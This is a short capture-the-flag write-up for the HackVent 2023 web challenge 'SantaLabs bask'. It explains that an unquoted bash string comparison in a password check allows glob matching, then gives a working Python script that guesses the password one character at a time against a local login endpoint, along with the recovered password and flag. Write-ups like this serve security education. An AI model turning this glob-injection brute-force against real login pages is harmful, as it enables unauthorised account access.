Gian Klug

HackVent 2023 - [HV23.08] SantaLabs bask

Posted on Jan 1, 2024
Tags: HackVent Writeup

Difficulty: Medium

Category: Web

Author: coderion

Ditch flask and complicated python. With SantaLabs bask, you can write interactive websites using good, old bash and even template your files by using dynamic scripting!

The initial password check fails to escape the string in quotes when doing string comparison. Thus it supports globbing and the password can be guessed:

import requests
from string import ascii_lowercase

password = ""
url = "http://localhost:3000/login"

def check_pw():
    body = f"password={password}"
    r = requests.post(url, body)
    if "logged" in r.text:
        return True
    return False

def check_glob(pw):
    body = f"password={pw}*"
    r = requests.post(url, body)
    if "logged" in r.text:
        return True
    return False

while True:
    for c in ascii_lowercase:
        check = password + c
        print(f"Trying: {check}")
        if check_glob(check):
            password += c
            break
    if check_pw():
        print(f"Password: {password}")
        break

We get salami as the password and can then log in to get the flag:

HV23{gl0bb1ng_1n_b45h_1s_fun}